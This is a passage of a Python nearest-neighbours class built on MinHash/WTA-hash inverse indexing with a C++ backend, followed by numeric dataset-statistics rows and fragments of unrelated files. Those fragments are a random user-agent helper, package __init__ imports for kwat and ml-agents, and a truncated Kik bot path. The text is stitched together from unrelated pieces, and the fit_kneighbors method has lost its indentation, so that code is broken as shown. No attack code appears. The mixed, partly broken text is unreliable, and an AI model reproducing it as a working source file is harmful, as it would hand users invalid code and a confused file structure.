original data is stored in the memory.
number_of_hash_functions : int, optional (default = '400')
Number of hash functions to use for computing the inverse index.
max_bin_size : int, optional (default = 50)
The number of maximal collisions for one hash value of one hash function. If one value of a hash function
has more collisions, this value will be ignored.
minimal_blocks_in_common : int, optional (default = 1)
The minimal number of hash collisions two instances have to be in common to be recognised. Everything less
will be ignored.
shingle_size : int, optional (default = 4)
Reduction factor for the signature size.
E.g. number_of_hash_functions=400 and shingle_size=4 --> Size of the signature will be 100
excess_factor : int, optional (default = 5)
Factor to return more neighbors internally as defined with n_neighbors. Factor is useful to increase the
precision of the :meth:`algorithm=exact` version of the implementation.
E.g.: n_neighbors = 5, excess_factor = 5. Internally n_neighbors*excess_factor = 25 neighbors will be returned.
Now the reduced data set for sklearn.NearestNeighbors is of size 25 and not 5.
similarity : {True, False}, optional (default = False)
If true: cosine similarity is used
If false: Euclidean distance is used
number_of_cores : int, optional (default = None)
Number of cores that should be used for openmp. If your system doesn't support openmp, this value
will have no effect. If it supports openmp and it is not defined, the maximum number of cores is used.
chunk_size : int, optional (default = None)
Number of elements one cpu core should work on. If it is set to "0" the default behaviour of openmp is used;
all cores are getting the same amount of data at once; e.g. 8-core cpu and 128 elements to process, every core will
get 16 elements at once.
prune_inverse_index : int, optional (default = -1)
Remove every hash value with less occurence than n. If -1 it is deactivated.
prune_inverse_index_after_instance: float, optional (default = -1.0)
Start all the pruning routines after x% of the data during the fitting process.
hash_algorithm: int, optional (default = 0)
Which hash function should be used. 0 for MinHash and 1 for WTA-Hash.
remove_hash_function_with_less_entries_as: int, optional (default =-1)
Remove every hash function with less hash values as n.
block_size : int, optional (default = 5)
How much more hash functions should be computed. Number is relevant for the shingels.
shingle : int, optional (default = 0)
store_value_with_least_sigificant_bit : int, optional (default = 0)
cpu_gpu_load_balancing : int, optional (default = 1)
0 if 100% cpu, 1 if 100% gpu.
gpu_hashing : int, optional (default = 1)
If the hashing of MinHash should be computed on the GPU (1) but the prediction is computed on the CPU.
If 0 it is deactivated.
speed_optimized : {True, False}, optional (default = None)
A parameter setting that is optimized for the best speed. Can not be used together with the parameter 'accuracy_optimized'.
If bad results are computed, try 'accuracy_optimized' or optimize the parameters with a hyperparameter optimization.
accuracy_optimized : {True, False}, optional (default = None)
A parameter setting that is optimized for the best accuracy. Can not be used together with the parameter 'speed_optimized'.
If results are computed to slow, try 'speed_optimized' or optimize the parameters with a hyperparameter optimization.
Notes
-----
The documentation is copied from scikit-learn and was only extend for a few cases. All examples are available there.
http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.NearestNeighbors.html#sklearn.neighbors.NearestNeighbors
"""
def __init__(self, n_neighbors=5, radius=1.0, fast=False, number_of_hash_functions=400,
             max_bin_size=50, minimal_blocks_in_common=1, shingle_size=4, excess_factor=5,
             similarity=False, number_of_cores=None, chunk_size=None, prune_inverse_index=-1,
             prune_inverse_index_after_instance=-1.0, remove_hash_function_with_less_entries_as=-1,
             hash_algorithm=0, block_size=5, shingle=0, store_value_with_least_sigificant_bit=0,
             cpu_gpu_load_balancing=0, gpu_hashing=0, rangeK_wta=10, maxFeatures=None, absolute_numbers=False):
    # Create the C++ backend object and remember its opaque address.
    # Parameter semantics are documented in the class docstring.
    # NOTE(review): the class docstring states default = 1 for
    # cpu_gpu_load_balancing and gpu_hashing, but the signature uses 0 —
    # confirm which is intended.
    self._maxFeatures = maxFeatures
    self.absoluteNumbers = absolute_numbers
    self.n_neighbors = n_neighbors
    if number_of_cores is None:
        # default to all available cores
        number_of_cores = mp.cpu_count()
    if chunk_size is None:
        # 0 tells the backend to pick the chunk size itself
        chunk_size = 0
    # upper bound on hash collisions == number of hash functions
    # (an earlier revision divided by shingle_size; that scaling is disabled)
    maximal_number_of_hash_collisions = int(number_of_hash_functions)
    self._index_elements_count = 0
    # Opaque pointer to the inverse index stored in C++. The positional
    # arguments below must stay in exactly this order (C extension ABI).
    self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.create_object(number_of_hash_functions,
                                    shingle_size, number_of_cores, chunk_size, n_neighbors,
                                    minimal_blocks_in_common, max_bin_size,
                                    maximal_number_of_hash_collisions, excess_factor,
                                    1 if fast else 0, 1 if similarity else 0,
                                    prune_inverse_index,
                                    prune_inverse_index_after_instance, remove_hash_function_with_less_entries_as,
                                    hash_algorithm,
                                    block_size,
                                    shingle, store_value_with_least_sigificant_bit, cpu_gpu_load_balancing, gpu_hashing, rangeK_wta)
def __del__(self):
    # Release the C++ object backing this instance; the stored value is
    # only an opaque address handed out by the extension module.
    _nearestNeighbors.delete_object(self._pointer_address_of_nearestNeighbors_object)
def fit(self, X, y=None):
    """Fit the model using X as training data.

    Parameters
    ----------
    X : {array-like, sparse matrix}, optional
        Training data. If array or matrix, shape = [n_samples, n_features].
        If X is None, a "lazy fitting" is performed: the fitting happens
        with the data passed to a later kneighbors call, and caching of
        computed hash values is deactivated in this case.
    y : list, optional (default = None)
        List of classes for the given input of X. Size has to be n_samples.
    """
    if y is not None:
        self._y_is_csr = True
        # check_X_y validates the pair; only the validated labels are kept
        _, self._y = check_X_y(X, y, "csr", multi_output=True)
        if self._y.ndim == 1 or self._y.shape[1] == 1:
            # a single-column target is treated as a dense 1-D label vector
            self._y_is_csr = False
    else:
        self._y_is_csr = False
    X_csr = csr_matrix(X)
    self._index_elements_count = X_csr.shape[0]
    if self._maxFeatures is None:
        # largest number of non-zero features in any single instance
        self._maxFeatures = int(max(X_csr.getnnz(1)))
    # returns a pointer to the inverse index stored in C++
    self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.fit(X_csr.indptr.tolist(), X_csr.indices.tolist(), X_csr.data.tolist(),
                                                        X_csr.shape[0], self._maxFeatures,
                                                        self._pointer_address_of_nearestNeighbors_object)
def partial_fit(self, X, y=None):
    """Extend the model by X as additional training data.

    Parameters
    ----------
    X : {array-like, sparse matrix}
        Training data. Shape = [n_samples, n_features]
    y : list, optional (default = None)
        List of classes for the given input of X. Size has to be n_samples.
    """
    if y is not None:
        if getattr(self, "_y", None) is None:
            # BUGFIX: previously this raised AttributeError when partial_fit
            # was the first call to supply labels; start a label store instead.
            self._y = np.asarray(y)
            self._y_is_csr = False
        elif self._y_is_csr:
            self._y = np.vstack([self._y, y])
        else:
            self._y = np.concatenate((self._y, y), axis=0)
    X_csr = csr_matrix(X)
    # BUGFIX: use the CSR shape; X itself may be a plain list of lists
    # without a .shape attribute.
    self._index_elements_count += X_csr.shape[0]
    # NOTE(review): self._maxFeatures is None until fit() has run once —
    # confirm the backend tolerates that for a partial_fit-only workflow.
    self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.partial_fit(
        X_csr.indptr.tolist(), X_csr.indices.tolist(), X_csr.data.tolist(),
        X_csr.shape[0], self._maxFeatures,
        self._pointer_address_of_nearestNeighbors_object)
def kneighbors(self, X=None, n_neighbors=None, return_distance=True, fast=None, similarity=None, pAbsoluteNumbers=None):
    """Find the n_neighbors of a point X or of all points of X.

    Parameters
    ----------
    X : {array-like, sparse matrix}, optional
        Query point(s), shape = [n_samples, n_features]. If None, the
        neighbors of every indexed point are returned and a point is not
        considered its own neighbor.
    n_neighbors : int, optional
        Number of neighbors to get (constructor value when None).
    return_distance : boolean, optional (default = True)
        If False, distances are not returned.
    fast : {True, False, None}, optional
        True: answer from the inverse index only. False: the inverse index
        preselects candidates and the stored original data answers the
        query. None: use the constructor setting.
    similarity : {True, False, None}, optional
        True: cosine similarity; False: Euclidean distance; None: use the
        constructor setting.
    pAbsoluteNumbers : {True, False, None}, optional
        True: report absolute hash-collision counts; otherwise a relative
        distance measure. None: use the constructor setting.

    Returns
    -------
    dist : array, shape = [n_samples, distances]
        Only present if return_distance=True.
    ind : array, shape = [n_samples, neighbors]
        Indices of the nearest points in the population matrix.
    """
    # Encode the tri-state flags for the C++ backend:
    # None -> -1 (use the constructor value), True -> 1, False -> 0.
    fast_flag = -1 if fast is None else (1 if fast else 0)
    similarity_flag = -1 if similarity is None else (1 if similarity else 0)
    if pAbsoluteNumbers is None:
        absolute_flag = self.absoluteNumbers
    else:
        absolute_flag = 0 if pAbsoluteNumbers == False else 1
    neighbor_count = n_neighbors if n_neighbors else 0
    distance_flag = 1 if return_distance else 0
    if X is None:
        result = _nearestNeighbors.kneighbors([], [], [],
                                              0, 0,
                                              neighbor_count,
                                              distance_flag,
                                              fast_flag, similarity_flag, absolute_flag,
                                              self._pointer_address_of_nearestNeighbors_object)
    else:
        query = csr_matrix(X)
        rows, cols = query.nonzero()
        max_features = int(max(query.getnnz(1)))
        result = _nearestNeighbors.kneighbors(rows.tolist(), cols.tolist(), query.data.tolist(),
                                              query.shape[0], max_features,
                                              neighbor_count,
                                              distance_flag,
                                              fast_flag, similarity_flag, absolute_flag,
                                              self._pointer_address_of_nearestNeighbors_object)
    if return_distance:
        return asarray(result[0]), asarray(result[1])
    return asarray(result[0])
def kneighbors_graph(self, X=None, n_neighbors=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
    """Compute the (weighted) graph of k-neighbors for points in X.

    Parameters
    ----------
    X : array-like, optional
        Query point(s). If None, the neighbors of every indexed point are
        returned and a point is not considered its own neighbor.
    n_neighbors : int, optional
        Number of neighbors per sample (constructor value when None).
    mode : {'connectivity', 'distance'}, optional
        'connectivity' returns a 0/1 matrix; 'distance' returns edge
        weights. Any other value makes the method return None.
    fast, similarity, pAbsoluteNumbers : {True, False, None}, optional
        Tri-state flags; None defers to the constructor setting.
    symmetric : {True, False} (default = True)
        If True the returned graph is symmetric.

    Returns
    -------
    A : sparse matrix in CSR format, shape = [n_samples, n_samples_fit]
        A[i, j] is the weight of the edge that connects i to j.
    """
    # None -> -1 (constructor value), True -> 1, False -> 0
    fast_flag = -1 if fast is None else (1 if fast else 0)
    similarity_flag = -1 if similarity is None else (1 if similarity else 0)
    if pAbsoluteNumbers is None:
        absolute_flag = self.absoluteNumbers
    else:
        absolute_flag = 0 if pAbsoluteNumbers == False else 1
    if mode == "connectivity":
        distance_flag = 0
    elif mode == "distance":
        distance_flag = 1
    else:
        # unknown mode: silently return None, as the original did
        return None
    neighbor_count = n_neighbors if n_neighbors else 0
    symmetric_flag = 1 if symmetric else 0
    if X is None:
        row, column, data = _nearestNeighbors.kneighbors_graph(
            [], [], [],
            0, 0,
            neighbor_count,
            distance_flag,
            fast_flag, symmetric_flag,
            similarity_flag, absolute_flag,
            self._pointer_address_of_nearestNeighbors_object)
    else:
        query = csr_matrix(X)
        rows, cols = query.nonzero()
        max_features = int(max(query.getnnz(1)))
        row, column, data = _nearestNeighbors.kneighbors_graph(
            rows.tolist(), cols.tolist(), query.data.tolist(),
            query.shape[0], max_features,
            neighbor_count,
            distance_flag,
            fast_flag, symmetric_flag,
            similarity_flag, absolute_flag,
            self._pointer_address_of_nearestNeighbors_object)
    return csr_matrix((data, (row, column)))
def radius_neighbors(self, X=None, radius=None, return_distance=None, fast=None, similarity=None, pAbsoluteNumbers=None):
    """Find the neighbors within a given radius of a point or points.

    Returns the indices and distances of each point from the dataset lying
    in a ball of size ``radius`` around the query points. Boundary points
    are included; results are *not* necessarily sorted by distance.

    Parameters
    ----------
    X : array-like, (n_samples, n_features), optional
        The query point or points. If None, the neighbors of every indexed
        point are returned and a point is not considered its own neighbor.
    radius : float, optional
        Limiting distance of neighbors to return; None passes 0 to the
        backend (constructor value).
    return_distance : boolean, optional
        If falsy, distances are not returned.
        NOTE(review): documented default was True but the parameter
        defaults to None, which this code treats as False — confirm.
    fast : {True, False, None}, optional
        True: inverse index only; False: preselect via the inverse index,
        then answer from the stored data; None: constructor value.
    similarity : {True, False, None}, optional
        True: cosine similarity; False: Euclidean distance; None: value
        defined at init.
    pAbsoluteNumbers : {True, False, None}, optional
        True: report absolute hash-collision counts; otherwise a relative
        distance measure.

    Returns
    -------
    dist : array, shape (n_samples,) of arrays
        Only present if return_distance is truthy.
    ind : array, shape (n_samples,) of arrays
        Indices of the approximate nearest points inside the ball.
    """
    if fast is None:
        fast = -1
    elif fast:
        fast = 1
    else:
        fast = 0
    # BUGFIX: 'similarity' was previously forwarded to the C extension
    # unconverted (e.g. as None), unlike every sibling method. Encode it
    # the same way: None -> -1 (constructor value), True -> 1, False -> 0.
    if similarity is None:
        similarity = -1
    elif similarity:
        similarity = 1
    else:
        similarity = 0
    # Two-stage normalization preserved from the original: first resolve
    # None to the constructor setting (which may be a bool), then force the
    # result to a strict 0/1 integer for the backend.
    if pAbsoluteNumbers is None:
        pAbsoluteNumbers = self.absoluteNumbers
    elif pAbsoluteNumbers == False:
        pAbsoluteNumbers = 0
    else:
        pAbsoluteNumbers = 1
    pAbsoluteNumbers = 0 if (pAbsoluteNumbers is None or pAbsoluteNumbers == False) else 1
    if radius is None:
        radius = 0
    if X is None:
        result = _nearestNeighbors.radius_neighbors([], [], [],
                                                    0, 0,
                                                    radius if radius else 0,
                                                    1 if return_distance else 0,
                                                    fast, similarity, pAbsoluteNumbers,
                                                    self._pointer_address_of_nearestNeighbors_object)
    else:
        X_csr = csr_matrix(X)
        instances, features = X_csr.nonzero()
        data = X_csr.data
        # BUGFIX: use the CSR shape; X itself may be a plain list of lists
        # without a .shape attribute.
        max_number_of_instances = X_csr.shape[0]
        maxFeatures = int(max(X_csr.getnnz(1)))
        result = _nearestNeighbors.radius_neighbors(instances.tolist(), features.tolist(), data.tolist(),
                                                    max_number_of_instances, maxFeatures,
                                                    radius if radius else 0,
                                                    1 if return_distance else 0,
                                                    fast, similarity, pAbsoluteNumbers,
                                                    self._pointer_address_of_nearestNeighbors_object)
    if return_distance:
        return asarray(result[0]), asarray(result[1])
    return asarray(result[0])
def radius_neighbors_graph(self, X=None, radius=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
    """Compute the (weighted) graph of neighbors for points in X.

    Neighborhoods are restricted to points at a distance lower than
    ``radius``.

    Parameters
    ----------
    X : array-like, shape = [n_samples, n_features], optional
        Query point(s). If None, the neighbors of every indexed point are
        returned and a point is not considered its own neighbor.
    radius : float, optional
        Radius of neighborhoods; None passes 0 (constructor value).
    mode : {'connectivity', 'distance'}, optional
        'connectivity' returns a 0/1 matrix; 'distance' returns edge
        weights. Any other value makes the method return None.
    fast, similarity, pAbsoluteNumbers : {True, False, None}, optional
        Tri-state flags; None defers to the constructor setting.
    symmetric : {True, False} (default = True)
        If True the returned graph is symmetric.

    Returns
    -------
    A : sparse matrix in CSR format, shape = [n_samples, n_samples]
        A[i, j] is the weight of the edge that connects i to j.
    """
    # None -> -1 (constructor value), True -> 1, False -> 0
    fast_flag = -1 if fast is None else (1 if fast else 0)
    similarity_flag = -1 if similarity is None else (1 if similarity else 0)
    if pAbsoluteNumbers is None:
        absolute_flag = self.absoluteNumbers
    else:
        absolute_flag = 0 if pAbsoluteNumbers == False else 1
    if mode == "connectivity":
        distance_flag = 0
    elif mode == "distance":
        distance_flag = 1
    else:
        # unknown mode: silently return None, as the original did
        return None
    radius_value = radius if radius else 0
    symmetric_flag = 1 if symmetric else 0
    if X is None:
        row, column, data = _nearestNeighbors.radius_neighbors_graph(
            [], [], [],
            0, 0,
            radius_value,
            distance_flag,
            fast_flag, symmetric_flag,
            similarity_flag, absolute_flag,
            self._pointer_address_of_nearestNeighbors_object)
    else:
        query = csr_matrix(X)
        rows, cols = query.nonzero()
        max_features = int(max(query.getnnz(1)))
        row, column, data = _nearestNeighbors.radius_neighbors_graph(
            rows.tolist(), cols.tolist(), query.data.tolist(),
            query.shape[0], max_features,
            radius_value,
            distance_flag,
            fast_flag, symmetric_flag,
            similarity_flag, absolute_flag,
            self._pointer_address_of_nearestNeighbors_object)
    return csr_matrix((data, (row, column)))
def fit_kneighbors(self, X, n_neighbors=None, return_distance=True, fast=None, similarity=None, pAbsoluteNumbers=None):
""""Fits and returns the n_neighbors of X.
Parameters
----------
X : {array-like, sparse matrix}, optional
Data point(s) to be searched for n_neighbors. Shape = [n_samples, n_features]
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int, optional
Number of neighbors to get (default is the value passed to the constructor).
return_distance : boolean, optional. Defaults to True.
If False, distances will not be returned
fast : {'True', 'False'}, optional (default = 'None')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
dist : array, shape = [n_samples, distances]
Array representing the lengths to points, only present if
return_distance=True
ind : array, shape = [n_samples, neighbors]
Indices of the nearest points in the population matrix."""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
X_csr = csr_matrix(X)
self._index_elements_count = X_csr.shape[0]
instances, features = X_csr.nonzero()
data = X_csr.data
maxFeatures = int(max(X_csr.getnnz(1)))
# returns a pointer to the inverse index stored in c++
result = _nearestNeighbors.fit_kneighbors(instances.tolist(), features.tolist(), data.tolist(),
X_csr.shape[0], maxFeatures,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
if return_distance:
return asarray(result[0]), asarray(result[1])
else:
return asarray(result[0])
def fit_kneighbor_graph(self, X, n_neighbors=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
    """Fit on X and compute the (weighted) graph of k-neighbors for X.

    Parameters
    ----------
    X : array-like
        Data to fit and query. A point is not considered its own neighbor.
    n_neighbors : int, optional
        Number of neighbors per sample (constructor value when None).
    mode : {'connectivity', 'distance'}, optional
        'connectivity' returns a 0/1 matrix; 'distance' returns edge
        weights. Any other value makes the method return None.
    fast, similarity, pAbsoluteNumbers : {True, False, None}, optional
        Tri-state flags; None defers to the constructor setting.
    symmetric : {True, False} (default = True)
        If True the returned graph is symmetric.

    Returns
    -------
    A : sparse matrix in CSR format, shape = [n_samples, n_samples_fit]
        A[i, j] is the weight of the edge that connects i to j.
    """
    # None -> -1 (constructor value), True -> 1, False -> 0
    fast_flag = -1 if fast is None else (1 if fast else 0)
    similarity_flag = -1 if similarity is None else (1 if similarity else 0)
    if pAbsoluteNumbers is None:
        absolute_flag = self.absoluteNumbers
    else:
        absolute_flag = 0 if pAbsoluteNumbers == False else 1
    if mode == "connectivity":
        distance_flag = 0
    elif mode == "distance":
        distance_flag = 1
    else:
        # unknown mode: silently return None, as the original did
        return None
    fitted = csr_matrix(X)
    self._index_elements_count = fitted.shape[0]
    rows, cols = fitted.nonzero()
    max_features = int(max(fitted.getnnz(1)))
    # the backend fits the inverse index and builds the graph in one step
    row, column, data = _nearestNeighbors.fit_kneighbor_graph(rows.tolist(), cols.tolist(), fitted.data.tolist(),
                                                              fitted.shape[0], max_features,
                                                              n_neighbors if n_neighbors else 0,
                                                              distance_flag,
                                                              fast_flag, 1 if symmetric else 0,
                                                              similarity_flag, absolute_flag,
                                                              self._pointer_address_of_nearestNeighbors_object)
    return csr_matrix((data, (row, column)))
def fit_radius_neighbors(self, X, radius=None, return_distance=None, fast=None, similarity=None, pAbsoluteNumbers=None):
    """Fit on X and find the neighbors within a given radius of X.

    Returns the indices and distances of each point from the dataset lying
    in a ball of size ``radius`` around the query points. Boundary points
    are included; results are *not* necessarily sorted by distance.

    Parameters
    ----------
    X : array-like, (n_samples, n_features)
        Data to fit and query. A point is not considered its own neighbor.
    radius : float, optional
        Limiting distance of neighbors to return; None passes 0
        (constructor value).
    return_distance : boolean, optional
        If falsy, distances are not returned.
    fast, similarity, pAbsoluteNumbers : {True, False, None}, optional
        Tri-state flags; None defers to the constructor setting.

    Returns
    -------
    dist : array, shape (n_samples,) of arrays
        Only present if return_distance is truthy.
    ind : array, shape (n_samples,) of arrays
        Indices of the approximate nearest points inside the ball.
    """
    # None -> -1 (constructor value), True -> 1, False -> 0
    fast_flag = -1 if fast is None else (1 if fast else 0)
    similarity_flag = -1 if similarity is None else (1 if similarity else 0)
    if pAbsoluteNumbers is None:
        absolute_flag = self.absoluteNumbers
    else:
        absolute_flag = 0 if pAbsoluteNumbers == False else 1
    fitted = csr_matrix(X)
    self._index_elements_count = fitted.shape[0]
    rows, cols = fitted.nonzero()
    max_features = int(max(fitted.getnnz(1)))
    # the backend fits the inverse index and answers the query in one step
    result = _nearestNeighbors.fit_radius_neighbors(rows.tolist(), cols.tolist(), fitted.data.tolist(),
                                                    fitted.shape[0], max_features,
                                                    radius if radius else 0,
                                                    1 if return_distance else 0,
                                                    fast_flag, similarity_flag, absolute_flag,
                                                    self._pointer_address_of_nearestNeighbors_object)
    if return_distance:
        return asarray(result[0]), asarray(result[1])
    return asarray(result[0])
def fit_radius_neighbors_graph(self, X, radius=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
    """Fit on X and compute the (weighted) radius-neighbors graph for X.

    Neighborhoods are restricted to points at a distance lower than
    ``radius``.

    Parameters
    ----------
    X : array-like, shape = [n_samples, n_features]
        Data to fit and query. A point is not considered its own neighbor.
    radius : float, optional
        Radius of neighborhoods; None passes 0 (constructor value).
    mode : {'connectivity', 'distance'}, optional
        'connectivity' returns a 0/1 matrix; 'distance' returns edge
        weights. Any other value makes the method return None.
    fast, similarity, pAbsoluteNumbers : {True, False, None}, optional
        Tri-state flags; None defers to the constructor setting.
    symmetric : {True, False} (default = True)
        If True the returned graph is symmetric.

    Returns
    -------
    A : sparse matrix in CSR format, shape = [n_samples, n_samples]
        A[i, j] is the weight of the edge that connects i to j.
    """
    # None -> -1 (constructor value), True -> 1, False -> 0
    fast_flag = -1 if fast is None else (1 if fast else 0)
    similarity_flag = -1 if similarity is None else (1 if similarity else 0)
    if pAbsoluteNumbers is None:
        absolute_flag = self.absoluteNumbers
    else:
        absolute_flag = 0 if pAbsoluteNumbers == False else 1
    if mode == "connectivity":
        distance_flag = 0
    elif mode == "distance":
        distance_flag = 1
    else:
        # unknown mode: silently return None, as the original did
        return None
    fitted = csr_matrix(X)
    self._index_elements_count = fitted.shape[0]
    rows, cols = fitted.nonzero()
    max_features = int(max(fitted.getnnz(1)))
    # the backend fits the inverse index and builds the graph in one step
    row, column, data = _nearestNeighbors.fit_radius_neighbors_graph(rows.tolist(), cols.tolist(), fitted.data.tolist(),
                                                                     fitted.shape[0], max_features,
                                                                     radius if radius else 0,
                                                                     distance_flag,
                                                                     fast_flag, 1 if symmetric else 0,
                                                                     similarity_flag, absolute_flag,
                                                                     self._pointer_address_of_nearestNeighbors_object)
    return csr_matrix((data, (row, column)))
def get_distribution_of_inverse_index(self):
    """Return the number of created hash values per hash function,
    the average size of elements per hash value per hash function,
    the mean and the standard deviation.

    The values are computed entirely inside the C++ backend.
    """
    return _nearestNeighbors.get_distribution_of_inverse_index(self._pointer_address_of_nearestNeighbors_object)
def _getY(self):
    # Internal accessor: returns the labels stored by fit()/partial_fit().
    # NOTE(review): presumably consumed by wrapper estimators — confirm.
    return self._y
def _getY_is_csr(self):
    # Internal accessor: True when the stored labels are multi-output
    # (kept as a 2-D structure), False for a 1-D label vector.
    return self._y_is_csr
| 51.928651
| 187
| 0.556441
| 5,156
| 46,580
| 4.904577
| 0.081071
| 0.009332
| 0.012812
| 0.022778
| 0.813785
| 0.796069
| 0.775625
| 0.757632
| 0.740312
| 0.731612
| 0
| 0.01003
| 0.385681
| 46,580
| 896
| 188
| 51.986607
| 0.873703
| 0.480313
| 0
| 0.786802
| 0
| 0
| 0.00688
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038071
| false
| 0
| 0.022843
| 0.005076
| 0.111675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee43b26ecdd9e791573d84bf7582a58ff9a3caf1
| 194
|
py
|
Python
|
imagedl/modules/utils/ua.py
|
CharlesPikachu/imagedl
|
86114e84d45462dbf1ad8f96be5705bbd892b59e
|
[
"Apache-2.0"
] | 6
|
2022-03-21T16:32:35.000Z
|
2022-03-27T04:51:30.000Z
|
imagedl/modules/utils/ua.py
|
CharlesPikachu/imagedl
|
86114e84d45462dbf1ad8f96be5705bbd892b59e
|
[
"Apache-2.0"
] | null | null | null |
imagedl/modules/utils/ua.py
|
CharlesPikachu/imagedl
|
86114e84d45462dbf1ad8f96be5705bbd892b59e
|
[
"Apache-2.0"
] | null | null | null |
'''
Function:
    Randomly generate a user-agent string
Author:
    Charles
WeChat official account:
    Charles的皮卡丘
'''
from user_agent import generate_user_agent


def randomua():
    """Return a randomly generated user-agent string."""
    return generate_user_agent()
| 13.857143
| 42
| 0.71134
| 22
| 194
| 6.045455
| 0.636364
| 0.203008
| 0.255639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 194
| 14
| 43
| 13.857143
| 0.83125
| 0.365979
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
ee6ff2d83b2f3ea1ce012ebfc436dd71eb81cb29
| 117
|
py
|
Python
|
kwat/internet/__init__.py
|
KwatME/ccal
|
d96dfa811482eee067f346386a2181ec514625f4
|
[
"MIT"
] | 5
|
2017-05-05T17:50:28.000Z
|
2019-01-30T19:23:02.000Z
|
kwat/internet/__init__.py
|
KwatME/ccal
|
d96dfa811482eee067f346386a2181ec514625f4
|
[
"MIT"
] | 5
|
2017-05-05T01:52:31.000Z
|
2019-04-20T21:06:05.000Z
|
kwat/internet/__init__.py
|
KwatME/ccal
|
d96dfa811482eee067f346386a2181ec514625f4
|
[
"MIT"
] | 5
|
2017-07-17T18:55:54.000Z
|
2019-02-02T04:46:19.000Z
|
from .download import download
from .download_and_extract import download_and_extract
from .get_name import get_name
| 29.25
| 54
| 0.871795
| 18
| 117
| 5.333333
| 0.388889
| 0.25
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 117
| 3
| 55
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c9a1f5f0f71d0b0971214921d0514538cb3c3a89
| 381
|
py
|
Python
|
ml-agents-envs/mlagents_envs/side_channel/__init__.py
|
LoopySantos27/ml-agents
|
2b175c8ea65d75814654812e1357d15be8b40d3f
|
[
"Apache-2.0"
] | 13,653
|
2017-09-19T15:56:02.000Z
|
2022-03-31T18:55:07.000Z
|
ml-agents-envs/mlagents_envs/side_channel/__init__.py
|
LoopySantos27/ml-agents
|
2b175c8ea65d75814654812e1357d15be8b40d3f
|
[
"Apache-2.0"
] | 3,623
|
2017-09-20T02:50:20.000Z
|
2022-03-31T06:37:25.000Z
|
ml-agents-envs/mlagents_envs/side_channel/__init__.py
|
LoopySantos27/ml-agents
|
2b175c8ea65d75814654812e1357d15be8b40d3f
|
[
"Apache-2.0"
] | 4,130
|
2017-09-19T17:36:34.000Z
|
2022-03-31T12:54:55.000Z
|
from mlagents_envs.side_channel.incoming_message import IncomingMessage # noqa
from mlagents_envs.side_channel.outgoing_message import OutgoingMessage # noqa
from mlagents_envs.side_channel.side_channel import SideChannel # noqa
from mlagents_envs.side_channel.default_training_analytics_side_channel import ( # noqa
DefaultTrainingAnalyticsSideChannel, # noqa
) # noqa
| 47.625
| 88
| 0.847769
| 45
| 381
| 6.844444
| 0.377778
| 0.214286
| 0.207792
| 0.25974
| 0.38961
| 0.301948
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107612
| 381
| 7
| 89
| 54.428571
| 0.905882
| 0.076115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c9ba65174f5da1faf959f408213523455c717c88
| 4,990
|
py
|
Python
|
kik_unofficial/datatypes/xmpp/group_adminship.py
|
3dik/kik-bot-api-unofficial
|
